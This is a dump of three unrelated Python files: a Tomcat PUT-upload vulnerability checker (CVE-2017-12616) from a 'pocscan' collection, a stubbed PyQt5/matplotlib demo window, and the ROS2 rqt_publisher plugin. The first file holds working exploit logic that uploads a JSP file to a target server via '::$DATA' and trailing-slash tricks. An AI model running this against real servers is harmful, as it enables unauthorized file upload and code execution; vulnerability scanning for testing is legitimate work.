e5fb1f72e9850b7e778c6e302a06e49f892d630d | 6c219c027c7d0ef454bdeac196bd773e8b95d602 | /system/tomcat/tomcat_put_exec.py | 5d95b87eb442bce192ffbb30043ed14ef2a86d4f | [] | no_license | aStrowxyu/pocscan | 663f3a3458140e1bce7b4dc3702c6014a4c9ac92 | 08c7e7454c6b7c601bc54c21172c4788312603b1 | refs/heads/master | 2020-04-19T10:00:56.569105 | 2019-01-29T09:31:31 | 2019-01-29T09:31:31 | 168,127,418 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,561 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
name: Tomcat代码执行漏洞(CVE-2017-12616)
referer: https://mp.weixin.qq.com/s/dgWT3Cgf1mQs-IYxeID_Mw
author: Lucifer
description: 当 Tomcat 运行在 Windows 主机上,且启用了 HTTP PUT 请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求向服务器上传包含任意代码的 JSP 文件。之后,JSP 文件中的代码将能被服务器执行。
影响版本:Apache Tomcat 7.0.0 - 7.0.79(7.0.81修复不完全)。
'''
import sys
import time
import hashlib
import requests
import datetime
import warnings
from termcolor import cprint
class tomcat_put_exec_BaseVerify:
def __init__(self, url):
self.url = url
def run(self):
headers = {
"User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
}
post_data = "thisisashell"
time_stamp = time.mktime(datetime.datetime.now().timetuple())
m = hashlib.md5(str(time_stamp).encode(encoding='utf-8'))
md5_str = m.hexdigest()
vulnurl = self.url + "/" + md5_str +".jsp::$DATA"
try:
req = requests.put(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
if req.status_code == 201:
cprint("[+]存在Tomcat代码执行漏洞...(高危)\tpayload: "+vulnurl+"\tshellpath: "+self.url+"/"+md5_str+".jsp", "red")
else:
cprint("[-]不存在tomcat_put_exec漏洞", "white", "on_grey")
except:
cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
time_stamp = time.mktime(datetime.datetime.now().timetuple())
m = hashlib.md5(str(time_stamp).encode(encoding='utf-8'))
md5_str = m.hexdigest()
vulnurl = self.url + "/" + md5_str +".jsp/"
try:
req = requests.put(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
if req.status_code == 201:
cprint("[+]存在Tomcat代码执行漏洞...(高危)\tpayload: "+vulnurl+"\tshellpath: "+self.url+"/"+md5_str+".jsp", "red")
else:
cprint("[-]不存在tomcat_put_exec漏洞", "white", "on_grey")
except:
cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
if __name__ == "__main__":
warnings.filterwarnings("ignore")
testVuln = tomcat_put_exec_BaseVerify(sys.argv[1])
testVuln.run()
| [
"[email protected]"
] | |
99d4e37e0d66355af8f0a5232e0a8b75df8ecdd0 | 4539b71e48ec47526f7f3834098e491383096fcd | /DemoUIonly-PythonQt/chap14matplotlib/Demo14_2Detail/myMainWindow.py | d7a681172d064cd1507c14f78d451967de8ba6bb | [] | no_license | likeke201/qt_code | e4d5ae8894153ae7a92e4ffdc01612c0aeb7510b | e0244558764bbbcc3646e828a907cdb1cdee6225 | refs/heads/master | 2022-12-06T11:23:38.068457 | 2020-08-30T05:16:12 | 2020-08-30T05:16:12 | 291,404,725 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 17,229 | py | # -*- coding: utf-8 -*-
import sys
from PyQt5.QtWidgets import (QApplication, QMainWindow,
QSplitter, QColorDialog, QLabel, QComboBox)
from PyQt5.QtCore import pyqtSlot,Qt
from PyQt5.QtGui import QColor
import numpy as np
import matplotlib as mpl
import matplotlib.style as mplStyle #一个模块
from matplotlib.backends.backend_qt5agg import (FigureCanvas,
NavigationToolbar2QT as NavigationToolbar)
from ui_MainWindow import Ui_MainWindow
class QmyMainWindow(QMainWindow):
def __init__(self, parent=None):
super().__init__(parent) #调用父类构造函数,创建窗体
self.ui=Ui_MainWindow() #创建UI对象
self.ui.setupUi(self) #构造UI界面
self.setWindowTitle("Demo14_2, 绘图主要对象的操作")
mplStyle.use("classic") #使用样式,必须在绘图之前调用,修改字体后才可显示汉字
mpl.rcParams['font.sans-serif']=['KaiTi','SimHei'] #显示汉字为 楷体, 汉字不支持 粗体,斜体等设置
mpl.rcParams['font.size']=12
## Windows自带的一些字体
## 黑体:SimHei 宋体:SimSun 新宋体:NSimSun 仿宋:FangSong 楷体:KaiTi
mpl.rcParams['axes.unicode_minus'] =False #减号unicode编码
pass
## ==============自定义功能函数========================
def __createFigure(self):
pass
def __getMag(self,w,zta=0.2,wn=1.0): ##计算幅频曲线的数据
w2=w*w
a1=1-w2/(wn*wn)
b1=a1*a1
b2=4*zta*zta/(wn*wn)*w2
b=np.sqrt(b1+b2)
mag=-20*np.log10(b) #单位dB
return mag
def __drawFig2X1(self): ##初始化绘图
pass
## ==============event处理函数==========================
## ==========由connectSlotsByName()自动连接的槽函数============
##=====ToolBox 第1组:==="Figure操作" 分组里的功能================
##=======1.1 suptitle 图表的标题
def __setFig_suptitle(self,refreshDraw=True): #设置suptitle
pass
@pyqtSlot(bool) ##"1.1 suptitle标题"groupBox
def on_groupBox_suptitle_clicked(self,checked):
pass
@pyqtSlot() ##"设置标题"按钮
def on_btnFig_Title_clicked(self):
self.__setFig_suptitle()
@pyqtSlot(int) ##字体大小
def on_spinFig_Fontsize_valueChanged(self,arg1):
self.__setFig_suptitle()
@pyqtSlot(bool) ##粗体
def on_chkBoxFig_Bold_clicked(self,checked):
self.__setFig_suptitle()
@pyqtSlot(bool) ##斜体
def on_chkBoxFig_Italic_clicked(self,checked):
self.__setFig_suptitle()
@pyqtSlot() ##文字颜色
def on_btnFig_TitleColor_clicked(self):
pass
@pyqtSlot() ##文字背景颜色
def on_btnFig_TitleBackColor_clicked(self):
pass
##=======1.2 背景与边框
@pyqtSlot(bool) ##set_frameon, 显示背景和边框
def on_chkBoxFig_FrameOn_clicked(self,checked):
pass
@pyqtSlot() ##set_facecolor 设置背景颜色
def on_btnFig_FaceColor_clicked(self):
pass
@pyqtSlot(str) ##设置样式
def on_comboFig_Style_currentIndexChanged(self,arg1):
pass
##=====1.3 边距,子图间隔
@pyqtSlot() ## tight_layout, 试验功能
def on_btnFigure_tightLayout_clicked(self):
self.__fig.tight_layout() #对所有子图 进行一次tight_layout
self.__fig.canvas.draw() #刷新
@pyqtSlot(float) ##left margin
def on_spinFig_marginLeft_valueChanged(self,value):
self.__fig.subplots_adjust(left=value)
self.__fig.canvas.draw()
@pyqtSlot(float) ##right margin
def on_spinFig_marginRight_valueChanged(self,value):
self.__fig.subplots_adjust(right=value)
self.__fig.canvas.draw()
@pyqtSlot(float) ##bottom margin
def on_spinFig_marginBottom_valueChanged(self,value):
self.__fig.subplots_adjust(bottom=value)
self.__fig.canvas.draw()
@pyqtSlot(float) ##top margin
def on_spinFig_marginTop_valueChanged(self,value):
self.__fig.subplots_adjust(top=value)
self.__fig.canvas.draw()
@pyqtSlot(float) ## wspace
def on_spinFig_wspace_valueChanged(self,value):
self.__fig.subplots_adjust(wspace=value)
self.__fig.canvas.draw()
@pyqtSlot(float) ## hspace
def on_spinFig_hspace_valueChanged(self,value):
self.__fig.subplots_adjust(hspace=value)
self.__fig.canvas.draw()
##=====ToolBox 第2组:"Axes子图操作" 分组里的功能================
@pyqtSlot(bool) ##子图是否可见
def on_chkBoxAxes_Visible_clicked(self,checked):
pass
##=======2.1 子图标题
def __setAxesTitle(self):
pass
@pyqtSlot(bool) ##"子图标题"GroupBox--CheckBox
def on_groupBox_AxesTitle_clicked(self,checked):
pass
@pyqtSlot() ##"设置标题"按钮
def on_btnAxes_Title_clicked(self):
self.__setAxesTitle() #设置标题
@pyqtSlot(int) ##字体大小
def on_spinAxes_Fontsize_valueChanged(self,arg1):
self.__setAxesTitle()
@pyqtSlot(bool) ##粗体
def on_chkBoxAxes_Bold_clicked(self,checked):
self.__setAxesTitle()
@pyqtSlot(bool) ##斜体
def on_chkBoxAxes_Italic_clicked(self,checked):
self.__setAxesTitle()
@pyqtSlot() ##文字颜色
def on_btnAxes_TitleColor_clicked(self):
pass
@pyqtSlot() ##文字背景颜色
def on_btnAxes_TitleBackColor_clicked(self):
pass
##=======2.2 子图外观
@pyqtSlot(bool) ##set_frame_on, 是否显示背景颜色
def on_chkBoxAxes_FrameOn_clicked(self,checked):
pass
@pyqtSlot() ##set_facecolor 设置背景颜色
def on_btnAxes_FaceColor_clicked(self):
pass
@pyqtSlot(bool) ##grid(),设置X网格可见性
def on_chkBoxAxes_GridX_clicked(self,checked):
pass
@pyqtSlot(bool) ##grid(), 设置Y网格可见性
def on_chkBoxAxes_GridY_clicked(self,checked):
pass
@pyqtSlot(bool) ##set_axis_on和 set_axis_off 显示/隐藏坐标轴
def on_chkBoxAxes_AxisOn_clicked(self,checked):
pass
@pyqtSlot(bool) ## minorticks_on 和 minorticks_off 显示/隐藏次刻度和网格
def on_chkBoxAxes_MinorTicksOn_clicked(self,checked):
pass
##======2.3 图例
@pyqtSlot(bool) ##图例可见
def on_groupBox_AexLegend_clicked(self,checked):
pass
@pyqtSlot(int) ##图例位置
def on_combo_LegendLoc_currentIndexChanged(self,index):
pass
@pyqtSlot(bool) ##图例可拖动
def on_chkBoxLegend_Dragable_clicked(self,checked):
pass
@pyqtSlot() ##重新生成图例
def on_btnLegend_regenerate_clicked(self):
pass
##=====ToolBox 第3组:"子图曲线设置" 分组里的功能================
##======3.1 选择操作的曲线
@pyqtSlot(int) ##选择当前操作曲线
def on_comboAxes_Lines_currentIndexChanged(self,index):
pass
##======3.2 曲线外观
@pyqtSlot(bool) ##曲线可见
def on_groupBox_LineSeries_clicked(self,checked):
pass
@pyqtSlot(str) ##set_linestyle
def on_comboSeries_LineStyle_currentIndexChanged(self,arg1):
pass
@pyqtSlot(int) ##线宽
def on_spinSeries_LineWidth_valueChanged(self,arg1):
pass
@pyqtSlot(str) ##set_drawstyle()
def on_comboSeries_DrawStyle_currentIndexChanged(self,arg1):
pass
@pyqtSlot() ##设置曲线颜色
def on_btnSeries_LineColor_clicked(self):
pass
##======3.3 标记点
@pyqtSlot(bool) ##标记点可见
def on_groupBox_Marker_clicked(self,checked):
pass
@pyqtSlot(str) ##set_marker 标记点形状
def on_comboMarker_Shape_currentIndexChanged(self,arg1):
pass
@pyqtSlot(int) ##set_markersize 标记点大小
def on_spinMarker_Size_valueChanged(self,arg1):
pass
@pyqtSlot() ##标记点颜色
def on_btnMarker_Color_clicked(self):
pass
@pyqtSlot(int) ##set_markeredgewidth 边线线宽
def on_spinMarker_EdgeWidth_valueChanged(self,arg1):
pass
@pyqtSlot() ##set_markeredgecolor边线颜色
def on_btnMarker_EdgeColor_clicked(self):
pass
##=====ToolBox 第4组:==="X坐标轴设置" 分组里的功能================
@pyqtSlot(bool) ##axisX 坐标轴可见型,包括label,tick,ticklabels
def on_groupBox_AxisX_clicked(self,checked):
pass
##======4.1 数据范围======
@pyqtSlot() ## set_xbound 设置范围,与set_xlim,它不管是否反向
def on_btnAxisX_setBound_clicked(self):
pass
@pyqtSlot() ## invert_xaxis 反向toggle
def on_chkBoxAxisX_Invert_clicked(self):
pass
@pyqtSlot(str) ## 设置坐标尺度
def on_comboAxisX_Scale_currentIndexChanged(self,arg1):
pass
##==========4.2 X轴标题
def __setAxisX_Label(self,refreshDraw=True):
pass
@pyqtSlot(bool) ##X 轴标题可见性
def on_groupBox_AxisXLabel_clicked(self,checked):
pass
@pyqtSlot() ##设置X轴Label
def on_btnAxisX_setLabel_clicked(self):
self.__setAxisX_Label()
@pyqtSlot(int) ##字体大小
def on_spinAxisX_LabelFontsize_valueChanged(self,arg1):
self.__setAxisX_Label()
@pyqtSlot(bool) ##粗体
def on_chkBoxAxisX_LabelBold_clicked(self,checked):
self.__setAxisX_Label()
@pyqtSlot(bool) ##斜体
def on_chkBoxAxisX_LabelItalic_clicked(self,checked):
self.__setAxisX_Label()
@pyqtSlot() ##文字颜色
def on_btnAxisX_LabelColor_clicked(self):
color=QColorDialog.getColor() #QColor
if color.isValid():
r,g,b,a=color.getRgbF() #getRgbF(self) -> Tuple[float, float, float, float]
objText=self.__setAxisX_Label(False)
objText.set_color((r,g,b,a)) #文字颜色
self.__fig.canvas.draw()
##======4.3 X轴主刻度标签
@pyqtSlot(bool) ##"4.3主刻度标签"GroupBox,刻度标签可见性
def on_groupBoxAxisX_TickLabel_clicked(self,checked):
pass
@pyqtSlot() ##设置标签格式
def on_btnAxisX_TickLabFormat_clicked(self):
pass
@pyqtSlot() ##文字颜色
def on_btnAxisX_TickLabColor_clicked(self):
pass
@pyqtSlot(int) ##字体大小
def on_spinAxisX_TickLabelFontsize_valueChanged(self,arg1):
pass
@pyqtSlot(bool) ## bottom axis major ticklabel
def on_chkBoxAxisX_TickLabBottom_clicked(self,checked):
pass
@pyqtSlot(bool) ## top axis major ticklabel
def on_chkBoxAxisX_TickLabTop_clicked(self,checked):
pass
##==========4.4 ===主刻度线和主网格线
@pyqtSlot(bool) ##bottom主刻度线
def on_chkBoxX_majorTickBottom_clicked(self,checked):
pass
@pyqtSlot(bool) ##top主刻度线
def on_chkBoxX_majorTickTop_clicked(self,checked):
pass
@pyqtSlot() ##主刻度线颜色
def on_btnLineColorX_majorTick_clicked(self):
pass
@pyqtSlot(bool) ##显示主网格线
def on_chkBoxX_majorGrid_clicked(self,checked):
pass
@pyqtSlot() ##主网格线颜色
def on_btnLineColorX_majorGrid_clicked(self):
pass
@pyqtSlot(str) ##主网格线样式
def on_comboLineStyle_XmajorGrid_currentIndexChanged(self,arg1):
pass
##==========4.5 次刻度线和次网格线
@pyqtSlot(bool) ##bottom次刻度线
def on_chkBoxX_minorTickBottom_clicked(self,checked):
pass
@pyqtSlot(bool) ##top次刻度线
def on_chkBoxX_minorTickTop_clicked(self,checked):
pass
@pyqtSlot() ##次刻度线颜色
def on_btnLineColorX_minorTick_clicked(self):
pass
@pyqtSlot(bool) ##显示次网格线
def on_chkBoxX_minorGrid_clicked(self,checked):
pass
@pyqtSlot() ##次网格线颜色
def on_btnLineColorX_minorGrid_clicked(self):
pass
@pyqtSlot(str) ##次网格线样式
def on_comboLineStyle_XminorGrid_currentIndexChanged(self,arg1):
pass
##=====ToolBox 第5组:==="Y坐标轴设置" 分组里的功能================
@pyqtSlot(bool) ## axisY 坐标轴可见型,包括label,tick,ticklabels
def on_groupBox_AxisY_clicked(self,checked):
pass
##======5.1 数据范围======
@pyqtSlot() ## set_xbound 设置范围,与set_xlim,它不管是否反向
def on_btnAxisY_setBound_clicked(self):
pass
@pyqtSlot() ## invert_xaxis 反向toggle
def on_chkBoxAxisY_Invert_clicked(self):
pass
@pyqtSlot(str) ## 设置坐标尺度
def on_comboAxisY_Scale_currentIndexChanged(self,arg1):
pass
##======5.2 Y轴标题
def __setAxisY_Label(self,refreshDraw=True):
pass
@pyqtSlot(bool) ##Y 轴标题可见性
def on_groupBox_AxisYLabel_clicked(self,checked):
pass
@pyqtSlot() ##设置Y轴Label
def on_btnAxisY_setLabel_clicked(self):
self.__setAxisY_Label()
@pyqtSlot(int) ##字体大小
def on_spinAxisY_LabelFontsize_valueChanged(self,arg1):
self.__setAxisY_Label()
@pyqtSlot(bool) ##粗体
def on_chkBoxAxisY_LabelBold_clicked(self,checked):
self.__setAxisY_Label()
@pyqtSlot(bool) ##斜体
def on_chkBoxAxisY_LabelItalic_clicked(self,checked):
self.__setAxisY_Label()
@pyqtSlot() ##文字颜色
def on_btnAxisY_LabelColor_clicked(self):
color=QColorDialog.getColor() #QColor
if color.isValid():
r,g,b,a=color.getRgbF() #getRgbF(self) -> Tuple[float, float, float, float]
objText=self.__setAxisY_Label(False)
objText.set_color((r,g,b,a)) #文字颜色
self.__fig.canvas.draw() #刷新
##======5.3 Y轴主刻度标签
@pyqtSlot(bool) ##刻度标签可见性
def on_groupBoxAxisY_TickLabel_clicked(self,checked):
pass
@pyqtSlot() ##设置标签格式
def on_btnAxisY_TickLabFormat_clicked(self):
pass
@pyqtSlot() ##文字颜色
def on_btnAxisY_TickLabColor_clicked(self):
color=QColorDialog.getColor()
if color.isValid():
r,g,b,a=color.getRgbF()
for label in self.__curAxes.yaxis.get_ticklabels():
label.set_color((r,g,b,a))
self.__fig.canvas.draw()
@pyqtSlot(int) #字体大小
def on_spinAxisY_TickLabelFontsize_valueChanged(self,arg1):
for label in self.__curAxes.yaxis.get_ticklabels():
label.set_fontsize(arg1)
self.__fig.canvas.draw()
@pyqtSlot(bool) ##Left axis major ticklabel
def on_chkBoxAxisY_TickLabLeft_clicked(self,checked):
pass
@pyqtSlot(bool) ##right axis major ticklabel
def on_chkBoxAxisY_TickLabRight_clicked(self,checked):
pass
##==========5.4 ===主刻度线和主网格线=====
@pyqtSlot(bool) ##显示Left主刻度线
def on_chkBoxY_majorTickLeft_clicked(self,checked):
pass
@pyqtSlot(bool) ##显示Right主刻度线
def on_chkBoxY_majorTickRight_clicked(self,checked):
pass
@pyqtSlot() ##主刻度线颜色
def on_btnLineColorY_majorTick_clicked(self):
pass
@pyqtSlot(bool) ##显示主网格线
def on_chkBoxY_majorGrid_clicked(self,checked):
pass
@pyqtSlot() ##主网格线颜色
def on_btnLineColorY_majorGrid_clicked(self):
pass
@pyqtSlot(str) ##主网格线样式
def on_comboLineStyle_YmajorGrid_currentIndexChanged(self,arg1):
pass
##==========5.5 ===次刻度线和次网格线=====
@pyqtSlot(bool) ##显示Left次刻度线
def on_chkBoxY_minorTickLeft_clicked(self,checked):
pass
@pyqtSlot(bool) ##显示Right次刻度线
def on_chkBoxY_minorTickRight_clicked(self,checked):
pass
@pyqtSlot() ##次刻度线颜色
def on_btnLineColorY_minorTick_clicked(self):
pass
@pyqtSlot(bool) ##显示次网格线
def on_chkBoxY_minorGrid_clicked(self,checked):
pass
@pyqtSlot() ##次网格线颜色
def on_btnLineColorY_minorGrid_clicked(self):
pass
@pyqtSlot(str) ##次网格线样式
def on_comboLineStyle_YminorGrid_currentIndexChanged(self,arg1):
pass
## =============自定义槽函数===============================
@pyqtSlot(int)
def do_currentAxesChaned(self,index): #当前子图切换
pass
## ============窗体测试程序 ================================
if __name__ == "__main__": #用于当前窗体测试
app = QApplication(sys.argv) #创建GUI应用程序
form=QmyMainWindow() #创建窗体
form.show()
sys.exit(app.exec_())
| [
"[email protected]"
] | |
9d7e53e4f1b89ea971dd1e49f599e7919a008497 | 4bab98acf65c4625a8b3c757327a8a386f90dd32 | /ros2-windows/Lib/site-packages/rqt_publisher/publisher.py | ecccbf727b1edfdae4f1dbb37ffd5136f5f52b43 | [] | no_license | maojoejoe/Peach-Thinning-GTRI-Agricultural-Robotics-VIP | e2afb08b8d7b3ac075e071e063229f76b25f883a | 8ed707edb72692698f270317113eb215b57ae9f9 | refs/heads/master | 2023-01-15T06:00:22.844468 | 2020-11-25T04:16:15 | 2020-11-25T04:16:15 | 289,108,482 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 17,547 | py | #!/usr/bin/env python
# Copyright (c) 2011, Dorian Scholz, TU Darmstadt
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of the TU Darmstadt nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from __future__ import division
import array
import math
import random
import time
from python_qt_binding.QtCore import Slot, QSignalMapper, QTimer, qWarning
from rclpy.exceptions import InvalidTopicNameException
from rclpy.qos import QoSProfile
from rqt_gui_py.plugin import Plugin
from .publisher_widget import PublisherWidget
from rqt_py_common.message_helpers import get_message_class
from rqt_py_common.topic_helpers import get_slot_type
_list_types = [list, tuple, array.array]
try:
import numpy
_list_types.append(numpy.ndarray)
except ImportError:
pass
_numeric_types = [int, float]
try:
import numpy
_numeric_types += [
numpy.int8, numpy.int16, numpy.int32, numpy.int64,
numpy.float16, numpy.float32, numpy.float64, numpy.float128,
]
except ImportError:
pass
class Publisher(Plugin):
def __init__(self, context):
super(Publisher, self).__init__(context)
self.setObjectName('Publisher')
self._node = context.node
# create widget
self._widget = PublisherWidget(self._node)
self._widget.add_publisher.connect(self.add_publisher)
self._widget.change_publisher.connect(self.change_publisher)
self._widget.publish_once.connect(self.publish_once)
self._widget.remove_publisher.connect(self.remove_publisher)
self._widget.clean_up_publishers.connect(self.clean_up_publishers)
if context.serial_number() > 1:
self._widget.setWindowTitle(
self._widget.windowTitle() + (' (%d)' % context.serial_number()))
# create context for the expression eval statement
self._eval_locals = {'i': 0}
for module in (math, random, time):
self._eval_locals.update(module.__dict__)
del self._eval_locals['__name__']
del self._eval_locals['__doc__']
self._publishers = {}
self._id_counter = 0
self._timeout_mapper = QSignalMapper(self)
self._timeout_mapper.mapped[int].connect(self.publish_once)
# add our self to the main window
context.add_widget(self._widget)
@Slot(str, str, float, bool)
def add_publisher(self, topic_name, type_name, rate, enabled):
topic_name = str(topic_name)
try:
self._node._validate_topic_or_service_name(topic_name)
except InvalidTopicNameException as e:
qWarning(str(e))
return
publisher_info = {
'topic_name': topic_name,
'type_name': str(type_name),
'rate': float(rate),
'enabled': bool(enabled),
}
self._add_publisher(publisher_info)
def _add_publisher(self, publisher_info):
publisher_info['publisher_id'] = self._id_counter
self._id_counter += 1
publisher_info['counter'] = 0
publisher_info['enabled'] = publisher_info.get('enabled', False)
publisher_info['expressions'] = publisher_info.get('expressions', {})
publisher_info['message_instance'] = self._create_message_instance(
publisher_info['type_name'])
if publisher_info['message_instance'] is None:
return
msg_module = get_message_class(publisher_info['type_name'])
if not msg_module:
raise RuntimeError(
'The passed message type "{}" is invalid'.format(publisher_info['type_name']))
# Topic name provided was relative, remap to node namespace (if it was set)
if not publisher_info['topic_name'].startswith('/'):
publisher_info['topic_name'] = \
self._node.get_namespace() + publisher_info['topic_name']
# create publisher and timer
publisher_info['publisher'] = self._node.create_publisher(
msg_module, publisher_info['topic_name'], qos_profile=QoSProfile(depth=10))
publisher_info['timer'] = QTimer(self)
# add publisher info to _publishers dict and create signal mapping
self._publishers[publisher_info['publisher_id']] = publisher_info
self._timeout_mapper.setMapping(publisher_info['timer'], publisher_info['publisher_id'])
publisher_info['timer'].timeout.connect(self._timeout_mapper.map)
if publisher_info['enabled'] and publisher_info['rate'] > 0:
publisher_info['timer'].start(int(1000.0 / publisher_info['rate']))
self._widget.publisher_tree_widget.model().add_publisher(publisher_info)
@Slot(int, str, str, str, object)
def change_publisher(self, publisher_id, topic_name, column_name, new_value, setter_callback):
handler = getattr(self, '_change_publisher_%s' % column_name, None)
if handler is not None:
new_text = handler(self._publishers[publisher_id], topic_name, new_value)
if new_text is not None:
setter_callback(new_text)
def _change_publisher_topic(self, publisher_info, topic_name, new_value):
publisher_info['enabled'] = (new_value and new_value.lower() in ['1', 'true', 'yes'])
# qDebug(
# 'Publisher._change_publisher_enabled(): %s enabled: %s' %
# (publisher_info['topic_name'], publisher_info['enabled']))
if publisher_info['enabled'] and publisher_info['rate'] > 0:
publisher_info['timer'].start(int(1000.0 / publisher_info['rate']))
else:
publisher_info['timer'].stop()
return None
def _change_publisher_type(self, publisher_info, topic_name, new_value):
type_name = new_value
# create new slot
slot_value = self._create_message_instance(type_name)
# find parent slot
slot_path = topic_name[len(publisher_info['topic_name']):].strip('/').split('/')
parent_slot = eval('.'.join(["publisher_info['message_instance']"] + slot_path[:-1]))
# find old slot
slot_name = slot_path[-1]
slot_index = parent_slot.__slots__.index(slot_name)
# restore type if user value was invalid
if slot_value is None:
qWarning('Publisher._change_publisher_type(): could not find type: %s' % (type_name))
return parent_slot._slot_types[slot_index]
else:
# replace old slot
parent_slot._slot_types[slot_index] = type_name
setattr(parent_slot, slot_name, slot_value)
self._widget.publisher_tree_widget.model().update_publisher(publisher_info)
def _change_publisher_rate(self, publisher_info, topic_name, new_value):
try:
rate = float(new_value)
except Exception:
qWarning('Publisher._change_publisher_rate(): could not parse rate value: %s' %
(new_value))
else:
publisher_info['rate'] = rate
# qDebug(
# 'Publisher._change_publisher_rate(): %s rate changed: %fHz' %
# (publisher_info['topic_name'], publisher_info['rate']))
publisher_info['timer'].stop()
if publisher_info['enabled'] and publisher_info['rate'] > 0:
publisher_info['timer'].start(int(1000.0 / publisher_info['rate']))
# make sure the column value reflects the actual rate
return '%.2f' % publisher_info['rate']
def _change_publisher_expression(self, publisher_info, topic_name, new_value):
expression = str(new_value)
if len(expression) == 0:
if topic_name in publisher_info['expressions']:
del publisher_info['expressions'][topic_name]
# qDebug(
# 'Publisher._change_publisher_expression(): removed expression'
# 'for: %s' % (topic_name))
else:
# Strip topic name from the full topic path
slot_path = topic_name.replace(publisher_info['topic_name'], '', 1)
slot_path, slot_array_index = self._extract_array_info(slot_path)
# Get the property type from the message class
slot_type, is_array = \
get_slot_type(publisher_info['message_instance'].__class__, slot_path)
if slot_array_index is not None:
is_array = False
if is_array:
slot_type = list
# strip possible trailing error message from expression
error_prefix = '# error'
error_prefix_pos = expression.find(error_prefix)
if error_prefix_pos >= 0:
expression = expression[:error_prefix_pos]
success, _ = self._evaluate_expression(expression, slot_type)
if success:
old_expression = publisher_info['expressions'].get(topic_name, None)
publisher_info['expressions'][topic_name] = expression
try:
self._fill_message_slots(
publisher_info['message_instance'], publisher_info['topic_name'],
publisher_info['expressions'], publisher_info['counter'])
except Exception as e:
if old_expression is not None:
publisher_info['expressions'][topic_name] = old_expression
else:
del publisher_info['expressions'][topic_name]
return '%s %s: %s' % (expression, error_prefix, e)
return expression
else:
return '%s %s evaluating as "%s"' % (
expression, error_prefix, slot_type.__name__)
def _extract_array_info(self, type_str):
array_size = None
if '[' in type_str and type_str[-1] == ']':
type_str, array_size_str = type_str.split('[', 1)
array_size_str = array_size_str[:-1]
if len(array_size_str) > 0:
array_size = int(array_size_str)
else:
array_size = 0
return type_str, array_size
def _create_message_instance(self, type_str):
base_type_str, array_size = self._extract_array_info(type_str)
try:
base_message_type = get_message_class(base_type_str)
except LookupError as e:
qWarning("Creating message type {} failed. Please check your spelling and that the "
"message package has been built\n{}".format(base_type_str, e))
return None
if base_message_type is None:
return None
if array_size is not None:
message = []
for _ in range(array_size):
message.append(base_message_type())
else:
message = base_message_type()
return message
def _evaluate_expression(self, expression, slot_type):
global _list_types
global _numeric_types
successful_eval = True
try:
# try to evaluate expression
value = eval(expression, {}, self._eval_locals)
except Exception as e:
qWarning('Python eval failed for expression "{}"'.format(expression) +
' with an exception "{}"'.format(e))
successful_eval = False
if slot_type is str:
if successful_eval:
value = str(value)
else:
# for string slots just convert the expression to str, if it did not
# evaluate successfully
value = str(expression)
successful_eval = True
elif successful_eval:
type_set = set((slot_type, type(value)))
# check if value's type and slot_type belong to the same type group, i.e. array types,
# numeric types and if they do, make sure values's type is converted to the exact
# slot_type
if type_set <= set(_list_types) or type_set <= set(_numeric_types):
# convert to the right type
value = slot_type(value)
if successful_eval and isinstance(value, slot_type):
return True, value
else:
qWarning('Publisher._evaluate_expression(): failed to evaluate ' +
'expression: "%s" as Python type "%s"' % (
expression, slot_type))
return False, None
def _fill_message_slots(self, message, topic_name, expressions, counter):
global _list_types
if topic_name in expressions and len(expressions[topic_name]) > 0:
# get type
if hasattr(message, '_type'):
message_type = message._type
else:
message_type = type(message)
self._eval_locals['i'] = counter
success, value = self._evaluate_expression(expressions[topic_name], message_type)
if not success:
value = message_type()
return value
# if no expression exists for this topic_name, continue with it's child slots
elif hasattr(message, 'get_fields_and_field_types'):
for slot_name in message.get_fields_and_field_types().keys():
value = self._fill_message_slots(
getattr(message, slot_name),
topic_name + '/' + slot_name, expressions, counter)
if value is not None:
setattr(message, slot_name, value)
elif type(message) in _list_types and (len(message) > 0):
for index, slot in enumerate(message):
value = self._fill_message_slots(
slot, topic_name + '[%d]' % index, expressions, counter)
# this deals with primitive-type arrays
if not hasattr(message[0], '__slots__') and value is not None:
message[index] = value
return None
@Slot(int)
def publish_once(self, publisher_id):
publisher_info = self._publishers.get(publisher_id, None)
if publisher_info is not None:
publisher_info['counter'] += 1
self._fill_message_slots(
publisher_info['message_instance'],
publisher_info['topic_name'],
publisher_info['expressions'],
publisher_info['counter'])
publisher_info['publisher'].publish(publisher_info['message_instance'])
@Slot(int)
def remove_publisher(self, publisher_id):
publisher_info = self._publishers.get(publisher_id, None)
if publisher_info is not None:
publisher_info['timer'].stop()
self._node.destroy_publisher(publisher_info['publisher'])
del publisher_info['publisher']
